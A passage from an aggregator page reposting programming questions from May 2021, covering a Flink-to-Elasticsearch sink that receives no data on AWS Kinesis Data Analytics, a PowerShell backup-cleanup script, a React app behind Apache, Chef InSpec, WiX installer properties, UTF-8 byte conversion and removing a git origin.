{      "locationInformation": "org.apache.flink.streaming.connectors.elasticsearch7.Elasticsearch7ApiCallBridge.verifyClientConnection(Elasticsearch7ApiCallBridge.java:135)",      "logger": "org.apache.flink.streaming.connectors.elasticsearch7.Elasticsearch7ApiCallBridge",      "message": "Pinging Elasticsearch cluster via hosts [https://...es.amazonaws.com:443] ...",      "threadName": "Window(TumblingEventTimeWindows(5000), EventTimeTrigger, WindowCountFunction) -> (Sink: Print to Std. Out, Sink: Unnamed, Sink: Print to Std. Out) (2/2)",      "applicationARN": "arn:aws:kinesisanalytics:...",      "applicationVersionId": "39",      "messageSchemaVersion": "1",      "messageType": "INFO"  }  

Response

{      "locationInformation": "org.elasticsearch.client.RequestLogger.logResponse(RequestLogger.java:59)",      "logger": "org.elasticsearch.client.RestClient",      "message": "request [HEAD https://...es.amazonaws.com:443/] returned [HTTP/1.1 200 OK]",      "threadName": "Window(TumblingEventTimeWindows(5000), EventTimeTrigger, WindowCountFunction) -> (Sink: Print to Std. Out, Sink: Unnamed, Sink: Print to Std. Out) (2/2)",      "applicationARN": "arn:aws:kinesisanalytics:...",      "applicationVersionId": "39",      "messageSchemaVersion": "1",      "messageType": "DEBUG"  }  
  • We could also verify that the messages had been read from the Kafka topic and sent for processing by looking at the Flink Dashboard Data is sent and received between tasks

What we have tried without luck

  • We had implemented a RichParallelSourceFunction which emits 1_000_000 messages and then exits
    • This worked well in the Local environment
    • The job finished in the AWS environment, but there was no data on the sink side
  • We had implemented an other RichParallelSourceFunction which emits 100 messages at each second
    • Basically we had two loops a while(true) outer and for inner
    • After the inner loop we called the Thread.sleep(1000)
    • This worked perfectly fine on the local environment
    • But in AWS we could see that checkpoints' size grow continuously and no message appeared in ELK
  • We have tried to run the KDA application with different parallelism settings
    • But there was no difference
  • We also tried to use different watermarking strategies (forBoundedOutOfOrderness, withIdle, noWatermarks)
    • But there was no difference
  • We have added logs for the ProcessWindowFunction and for the ElasticsearchSinkFunction
    • Whenever we run the application from IDEA then these logs were on the console
    • Whenever we run the application with KDA then there was no such logs in CloudWatch
      • Those logs that were added to the main they do appear in the CloudWatch logs

We suppose that we don't see data on the sink side because the window processing logic is not triggered. That's why don't see processing logs in the CloudWatch.

Any help would be more than welcome!


Update #1

  • We have tried to downgrade the Flink version from 1.12.1 to 1.11.1
    • There is no change
  • We have tried processing time window instead of event time
    • It did not even work on the local environment

Having trouble automating removing files using Powershell

Posted: 17 May 2021 07:49 AM PDT

The goal of my code is to automate removing files from the backup location. First, it needs to make sure that it is removing files from the current year. Then, it needs to make sure that the files exist in both the backup and archive directories before it can successfully remove the files. I have marked where I know where the error is which is where it is checking to see if the files exists in both locations. It keeps saying that I cannot bind argument to parameter 'Path' because it is null.

<#Purpose of this program is to delete files from backup not from current Year that exists both in archive and backup#>  Function Delete-Files ($src, $dst)  {      #if source folder or destination folder doesn't exist, break      if (!(Test-Path $src))      {          "$src does not exist"          break;      }      if (!(Test-Path $dst))      {          "$dst does not exist"      }      Set-Location $src      #gets the files for the path the function is calling for      Get-ChildItem $src |      #where they were updated not this year      Where-Object {$_.LastWriteTime.year -ne (Get-Date).year} |      #checks to make sure that the files that are getting deleted exists in the archive      Where-Object {!(Test-Path (Join-Path $dst $_.Name))} ###what I think is causing the error      ForEach-Object {      #code to delete files          if ($files -ne $null) #if there are files to be deleted          {              "`nRemoving files"              $null = Remove-Item $_.FullName $src          }          else                  #if there are not files to be deleted          {              "`nFiles do not exist"          }      }  }    #file location declared for $src  #file location declared for $dst  Delete-Files $src $dst  

All Inertia requests must receive a valid Inertia response, however a plain JSON response was received

Posted: 17 May 2021 07:48 AM PDT

i am trying to understand and resolve this InertiaJs error without success i hope i can get some help here.  valid Inertia response

React app showing page with "404 the requested path could not be found" when using Apache

Posted: 17 May 2021 07:48 AM PDT

I am deploying a React app to my Apache server.

I can access the app on my-ip:5001, but when I go to my domain it gives me "404 the requested path could not be found". Btw. the domain has been set up and worked with an html file before working with react.

enter image description here

I did npm run build and placed the build folder in the root of my server. Made no changes to the package.json file.

I run the server using: serve -s -l 5001

Apache conf file:

<IfModule mod_ssl.c>  <VirtualHost *:443>              ServerName somedomain.com          ServerAlias www.somedomain.com        ProxyRequests On  ProxyVia On  <Proxy *>    Order deny,allow    Allow from all    </Proxy>            ProxyPass / http://localhost:5001/          ProxyPassReverse / http://localhost:5001/        </VirtualHost>  </IfModule>  

Any idea what might be going on here?

Possible to use Chef variables within Inspec?

Posted: 17 May 2021 07:49 AM PDT

I'm learning to write integration tests for my Chef cookbooks. Is it possible to reference variables from the attributes folder within my test?

Here's my test to make sure httpd and php are installed properly. However, I have additional packages I want to check for.

test/smoke/default/install.rb

%w(httpd php).each do |rpm_package|    describe package(rpm_package) do      it { should be_installed }    end  end  

attributes/default.rb

default['ic_apachephp']['php_packages'] = [                                'php-mysqlnd',                                'php-mbstring',                                'php-gd',                                'php-xml',                                'php'                              ]  

How to disable Repair and option buttons on WiX toolset

Posted: 17 May 2021 07:49 AM PDT

Plenty of questions regarding this issue but none of them explain where exactly those two lines should be placed:

<Property Id="ARPNOREPAIR" Value="yes" Secure="yes" />   <Property Id="ARPNOMODIFY" Value="yes" Secure="yes" />  

Tried searching online, on the documentation itself but no luck

EDIT

I tried putting them inside my tag but it's still there:

enter image description here

How to convert UTF8 string to byte array?

Posted: 17 May 2021 07:49 AM PDT

The .charCodeAt function returns with the unicode code of the caracter. But I would like to get the byte array instead. I know, if the charcode is over 127, then the character is stored in two or more bytes.

var arr=[];  for(var i=0; i<str.length; i++) {      arr.push(str.charCodeAt(i))  }  

How to remove origin from git repository

Posted: 17 May 2021 07:49 AM PDT

Basic question: How do I disassociate a git repo from the origin from which it was cloned?

git branch -a shows:

* master    remotes/origin/HEAD -> origin/master  

and I want to remove all knowledge of origin, and the associated revisions.

Longer question: I want to take an existing subversion repo and make a number of smaller git repos from it. Each of the new git repos should have the full history of just the relevant branch. I can prune the repo to just the wanted subtree using:

git filter-branch --subdirectory-filter path/to/subtree HEAD  

but the resulting repo still contains all the revisions of the now-discarded subtrees under the origin/master branch.

I realise that I could use the -T flag to git-svn to clone the relevant subtree of the subversion repo in the first place. I'm not sure if that would be more efficient than later running multiple instantiations of git filter-branch --subdirectory-filter on copies of the git repo but, in any case, I would still like to break the link with the origin.

No comments:

Post a Comment